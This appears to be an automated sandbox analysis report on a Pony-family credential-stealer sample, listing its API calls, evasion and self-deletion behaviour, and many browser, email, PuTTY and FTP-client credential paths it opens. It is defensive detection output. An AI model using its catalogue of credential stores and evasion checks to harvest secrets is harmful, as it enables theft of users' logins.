Classification label: mal100.troj.spyw.evad.winEXE@5/1@1/0

Source: C:\Users\user\Desktop\820.exe

Code function: 0_2_0040D328 CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmp,lstrcmp,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore,

0_2_0040D328

Source: C:\Users\user\Desktop\820.exe

Code function: 0_2_004028F0 LookupPrivilegeValueA,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,FindCloseChangeNotification,

0_2_004028F0

Source: C:\Users\user\Desktop\820.exe

Code function: 0_2_00402C5B WTSGetActiveConsoleSessionId,CreateToolhelp32Snapshot,Process32First,StrStrIA,ProcessIdToSessionId,OpenProcess,OpenProcessToken,ImpersonateLoggedOnUser,RegOpenCurrentUser,CloseHandle,CloseHandle,CloseHandle,Process32Next,CloseHandle,

0_2_00402C5B

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7428:120:WilError_03

Source: C:\Users\user\Desktop\820.exe

File created: C:\Users\user\AppData\Local\Temp\6575781.bat

Jump to behavior

Source: C:\Users\user\Desktop\820.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\6575781.bat" "C:\Users\user\Desktop\820.exe" "

Source: 820.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\820.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\820.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 820.exe, 00000000.00000003.1621410526.00000000006E3000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 820.exe	ReversingLabs: Detection: 100%
Source: 820.exe	Virustotal: Detection: 87%

Source: unknown	Process created: C:\Users\user\Desktop\820.exe "C:\Users\user\Desktop\820.exe"
Source: C:\Users\user\Desktop\820.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\6575781.bat" "C:\Users\user\Desktop\820.exe" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\820.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\6575781.bat" "C:\Users\user\Desktop\820.exe" "	Jump to behavior

Source: C:\Users\user\Desktop\820.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior

Source: C:\Users\user\Desktop\820.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\820.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

Jump to behavior

Data Obfuscation

Yara detected aPLib compressed binary

Source: Yara match	File source: 820.exe, type: SAMPLE
Source: Yara match	File source: 0.2.820.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.820.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1616594000.0000000000413000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 820.exe PID: 7324, type: MEMORYSTR

Source: C:\Users\user\Desktop\820.exe

Code function: 0_2_0040245E LoadLibraryA,GetProcAddress,

0_2_0040245E

Hooking and other Techniques for Hiding and Protection

Drops / launches Pony Loader self-deletion script - malware possibly based on Pony Loader leaked source code

Source: C:\Users\user\Desktop\820.exe

File dump: 6575781.bat.0.dr 3880EEB1C736D853EB13B44898B718AB

Jump to dropped file

Source: C:\Users\user\Desktop\820.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Source: C:\Users\user\Desktop\820.exe

Evasive API call chain: RegOpenKey,DecisionNodes,Sleep

graph_0-11054

Source: C:\Users\user\Desktop\820.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_0-8340

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\820.exe	Code function: 0_2_0040514D FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,	0_2_0040514D
Source: C:\Users\user\Desktop\820.exe	Code function: 0_2_00404110 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	0_2_00404110
Source: C:\Users\user\Desktop\820.exe	Code function: 0_2_00404DDD FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,	0_2_00404DDD
Source: C:\Users\user\Desktop\820.exe	Code function: 0_2_00408A4F FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	0_2_00408A4F
Source: C:\Users\user\Desktop\820.exe	Code function: 0_2_004088CB FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	0_2_004088CB
Source: C:\Users\user\Desktop\820.exe	Code function: 0_2_0040979C FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlen,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,	0_2_0040979C

Source: C:\Users\user\Desktop\820.exe

Code function: 0_2_00404567 GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,

0_2_00404567

Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: 820.exe, 00000000.00000002.1635331357.000000000068E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllk^[
Source: 820.exe, 00000000.00000002.1635331357.00000000006D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\

Source: C:\Users\user\Desktop\820.exe

Code function: 0_2_0040245E LoadLibraryA,GetProcAddress,

0_2_0040245E

Source: C:\Users\user\Desktop\820.exe

Code function: 0_2_00410194 lstrcmpiA,LogonUserA,lstrlen,LCMapStringA,LogonUserA,LogonUserA,74781B10,ImpersonateLoggedOnUser,RevertToSelf,74775030,CloseHandle,

0_2_00410194

Source: C:\Users\user\Desktop\820.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\6575781.bat" "C:\Users\user\Desktop\820.exe" "

Jump to behavior

Source: C:\Users\user\Desktop\820.exe

Code function: 0_2_0040443C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_0040443C

Source: C:\Users\user\Desktop\820.exe

Code function: GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,

0_2_00404567

Source: C:\Users\user\Desktop\820.exe

Code function: 0_2_00410365 OleInitialize,GetUserNameA,

0_2_00410365

Source: C:\Users\user\Desktop\820.exe

Code function: 0_2_00404567 GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,

0_2_00404567

Stealing of Sensitive Information

Yara detected Pony

Source: Yara match	File source: 820.exe, type: SAMPLE
Source: Yara match	File source: 0.2.820.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.820.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1616612816.0000000000414000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 820.exe PID: 7324, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\820.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\wcx_ftp.ini	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\History.dat	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\History.dat	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\SharedSettings.ccs	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\Frigate3\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\FTP Explorer\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.ccs	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\SiteDesigner\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\INSoftware\NovaFTP\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\SharedSettings_1_0_5.ccs	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\TurboFTP\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.ccs	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\BlazeFtp\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\RhinoSoft.com\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\SharedSettings.ccs	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\Estsoft\ALFTP\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: HKEY_CURRENT_USER\Software\TurboFTP	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\FTPInfo\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\AceBIT	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\ExpanDrive\drives.js	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\NetSarang\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\BitKinex\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\FileZilla\filezilla.xml	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\LeapWare\LeapFTP\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\GPSoftware\Directory Opus\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\BitKinex\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.ccs	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\filezilla.xml	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: HKEY_CURRENT_USER\Software\AceBIT	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\Estsoft\ALFTP\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\3\History.dat	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\FTPInfo\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\FileZilla\filezilla.xml	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\CoffeeCup Software\SharedSettings.ccs	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\BitKinex\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Sites.dat	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\SharedSettings_1_0_5.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Program Files (x86)\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\SharedSettings.ccs	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\4\History.dat	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.ccs	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\SmartFTP\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\GHISLER\wcx_ftp.ini	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Quick.dat	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\ExpanDrive\drives.js	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\BlazeFtp\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\FlashFXP\4\Sites.dat	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\INSoftware\NovaFTP\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\FTP Explorer\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\FTPGetter\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\SharedSettings.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Program Files (x86)\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\3\Quick.dat	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\4\Sites.dat	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\NetSarang\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\LeapWare\LeapFTP\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\TurboFTP	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\SmartFTP\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: HKEY_CURRENT_USER\Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\TurboFTP\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.ccs	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: HKEY_CURRENT_USER\Software\FTP Explorer\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\Frigate3\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: HKEY_CURRENT_USER\Software\MAS-Soft\FTPInfo\Setup	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\GHISLER\wcx_ftp.ini	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.ccs	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\AceBIT\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\FileZilla\sitemanager.xml	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\CoffeeCup Software\SharedSettings.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\TurboFTP\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\3\Sites.dat	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\RhinoSoft.com\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\FTP Explorer\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\AceBIT\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\FlashFXP\3\Quick.dat	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\FTPRush\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\Estsoft\ALFTP\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\ExpanDrive\drives.js	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\4\Quick.dat	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\GPSoftware\Directory Opus\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\FlashFXP\3\Sites.dat	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\FileZilla\sitemanager.xml	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\BlazeFtp\	Jump to behavior
